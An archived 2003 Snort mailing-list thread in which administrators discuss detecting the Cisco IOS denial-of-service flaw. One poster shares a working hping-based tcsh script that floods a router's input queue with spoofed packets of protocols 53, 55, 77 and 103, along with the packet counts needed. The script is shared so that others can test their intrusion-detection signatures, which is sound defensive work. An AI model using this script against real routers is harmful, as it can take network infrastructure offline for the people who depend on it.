Problem with test script for Cisco vulnerability

[CMartin () infosol com]

I tried to implement this script to test my snort rules; however, it appears
that I don't have hping in my /usr/local/sbin directory or not in my /sbin
directory.  I am running redhat v9.  Also I get the following error when I
try to run the script (sh exploit.sh).

exploit.sh: line 8: syntax error near unexpected token `('
exploit.sh: line 8: `foreach protocol (53 55 77 103)'

I'm wondering if the foreach is contructed properly.  As for the hping, I'm
sure I will find the program somewhere online.  But also an interesting
note, my whole /usr/local/sbin is empty. Can anyone help?

-----Original Message-----
From: Donahue, Pat [mailto:PDonahue () acmicorp com] 
Sent: Monday, July 21, 2003 6:44 AM
To: Eric Hines; Michael Scheidell; Compton, Rich
Cc: snort-sigs () lists sourceforge net; Snort-users () lists sourceforge net
Subject: RE: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS
Vulnerability

Here's a simple script I wrote that you can use to generate an attack:

> cat exploit.sh
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
  echo "usage: $0 <router hostname|address> <ttl>"
  exit
endif

foreach protocol (53 55 77 103)
    /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
$protocol --count 19 --interval u250 --data 26
end

As you can see, this script iterates over the various protocols and sends 19
packets each for a total of 76 (just enough to fill up the input queue on
vulnerable routers). Before upgrading my routers, I confirmed that this
attack works. I then tested to see if sending 76 packets of a single
protocol was enough to hose the interface.. it was. Maybe I mis-read the
original advisory, but it seemed to me that Cisco suggested all 4 were
necessary. 

Therefore, be careful when creating your signatures.. If you don't use any
of the above protocols (SWIPE, IP Mobility, Sun ND, PIM) it might make sense
to have rules that log/alert on all of them. Don't make the rules too
dependent on the payload either; in several packet captures I've seen, the
payload is significantly larger than the 26 bytes necessary to exploit IOS.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation
 

-----Original Message-----
From: Eric Hines [mailto:loki () fatelabs com]
Sent: Friday, July 18, 2003 8:02 PM
To: 'Michael Scheidell'; 'Compton, Rich'
Cc: snort-sigs () lists sourceforge net; Snort-users () lists sourceforge net
Subject: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS
Vulnerability


There is definitely an exploit out.. I've got it.. Those of you who
would like to generate a Snort signature from it can get the exploit off
the Full-Disclosure mailing list.



Regards,

Eric Hines
CEO, Chairman

===============================================

Eric Hines
CEO, Chairman
Applied Watch Technologies, Inc.
eric.hines () appliedwatch com
-----------------------------------------------
Corporate Headquarters
1650 Carlemont Dr. 
Suite D 
Crystal Lake, IL. 60014 
-----------------------------------------------
Direct Toll Free: (877) 262-7593 (x327)
Fax: (815) 425-2173 
-----------------------------------------------
Main Switchboard: (877) 262-7593 (9am-5pm CST)
Commercial Sales: (877) 262-7593 (opt1)
Government Sales: (877) 262-7593 (opt2)

===============================================


-----Original Message-----
From: Michael Scheidell [mailto:scheidell () secnap net] 
Sent: Friday, July 18, 2003 9:01 AM
To: Compton, Rich
Cc: 'snort-sigs () lists sourceforge net';
Snort-users () lists sourceforge net
Subject: Re: [Snort-sigs] Suggested Sig for Cisco DOS Vulnerability


> Hey guys,
> Doesn't look like a exploit exists as of yet but Cisco just released
what IP
> protocols cause the DOS so it won't be long until there is one!

from http://www.theregister.co.uk/content/55/31825.html
someone sent shadowchode.tar.gz to [Full-Disclosure] list.

Cisco IOS DoS exploit released in the wild 
By John Leyden
Posted: 18/07/2003 at 12:01 GMT

The risk posed by a serious DoS vulnerability to a wide range of Cisco
Systems routers and switches has been upgraded following the release of
an exploit onto a full disclosure mailing list. 


-------------------------------------------------------
This SF.net email is sponsored by: VM Ware
With VMware you can run multiple operating systems on a single machine.
WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the
same time. Free trial click here: http://www.vmware.com/wl/offer/345/0
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs




-------------------------------------------------------
This SF.net email is sponsored by: VM Ware
With VMware you can run multiple operating systems on a single machine.
WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the
same time. Free trial click here: http://www.vmware.com/wl/offer/345/0
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users


-------------------------------------------------------
This SF.net email is sponsored by: VM Ware
With VMware you can run multiple operating systems on a single machine.
WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the
same time. Free trial click here: http://www.vmware.com/wl/offer/345/0
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users


-------------------------------------------------------
This SF.net email is sponsored by: VM Ware
With VMware you can run multiple operating systems on a single machine.
WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the
same time. Free trial click here: http://www.vmware.com/wl/offer/345/0
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users